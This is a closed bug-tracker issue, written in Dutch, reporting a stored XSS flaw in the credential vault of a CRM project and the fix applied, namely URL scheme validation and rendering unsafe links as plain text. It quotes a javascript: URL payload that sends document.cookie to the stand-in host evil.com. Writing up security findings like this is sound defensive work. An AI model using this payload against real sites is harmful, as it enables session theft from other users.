F-02: Stored XSS in wachtwoordkluis (javascript:-URL) #112

Closed
opened 2026-05-26 18:23:43 +00:00 by jesse-a · 1 comment
Owner

Severity: HIGH

Het url-veld van een CustomerCredential werd niet gevalideerd. Een MANAGER kon een credential opslaan met URL javascript:fetch('//evil.com?cookie='+document.cookie) — wanneer een andere user de kluis-pagina opende en op de link klikte, executed het script in de CRM-origin.

Fix: server-side URL-validatie (alleen http:///https:// schemes); CredentialVault-component rendert oude/onveilige URLs nu als platte tekst i.p.v. klikbare link.

**Severity: HIGH** Het `url`-veld van een CustomerCredential werd niet gevalideerd. Een MANAGER kon een credential opslaan met URL `javascript:fetch('//evil.com?cookie='+document.cookie)` — wanneer een andere user de kluis-pagina opende en op de link klikte, executed het script in de CRM-origin. **Fix**: server-side URL-validatie (alleen `http://`/`https://` schemes); `CredentialVault`-component rendert oude/onveilige URLs nu als platte tekst i.p.v. klikbare link.
Author
Owner

Opgelost in commit 4d080f2.

Opgelost in commit 4d080f2.
Sign in to join this conversation.
No milestone
No project
No assignees
1 participant
Notifications
Due date
The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference
jesse-a/OpenCRM#112
No description provided.